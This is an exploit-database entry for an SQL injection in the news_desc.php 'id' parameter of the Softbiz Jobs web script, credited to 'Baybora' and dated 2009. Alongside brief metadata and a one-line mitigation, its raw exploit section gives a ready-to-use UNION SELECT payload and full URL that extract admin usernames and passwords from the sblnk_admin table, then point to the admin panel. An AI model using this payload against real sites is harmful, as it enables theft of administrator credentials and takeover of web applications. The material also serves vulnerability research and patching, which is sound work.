Softbiz Jobs ( news_desc) SQL Injection Vulnerability

vendor:

Softbiz Jobs ( news_desc)

by:

Baybora

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Softbiz Jobs ( news_desc)

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Softbiz Jobs ( news_desc) SQL Injection Vulnerability

Softbiz Jobs ( news_desc) is vulnerable to SQL injection. An attacker can exploit this vulnerability by sending a specially crafted SQL query to the vulnerable parameter 'id' in the 'news_desc.php' script. This can allow the attacker to gain access to the admin panel of the application.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

Softbiz Jobs ( news_desc) SQL Injection Vulnerability

########################### 
Author    : Baybora

Homepage  : http://www.1923turk.com 

Blog      : http://baybora.wordpress.com/

Script    : softbizscripts

Download  : http://www.softbizscripts.com/

########################### 
  
Exploat  :news_desc.php?id=SQL 
   

-4+union+select+1,concat(username,0x3a,password),3,4,5+from+sblnk_admin--
  
  
  
http://server/news_desc.php?id=-4+union+select+1,concat(username,0x3a,password),3,4,5+from+sblnk_admin--
  
 
http://xxxx/admin
 
  
##############################################################  
# Greetz: Manas58 - Gamoscu - Delibey - Tiamo - Psiko - Turco - infazci - X-TRO  
##############################################################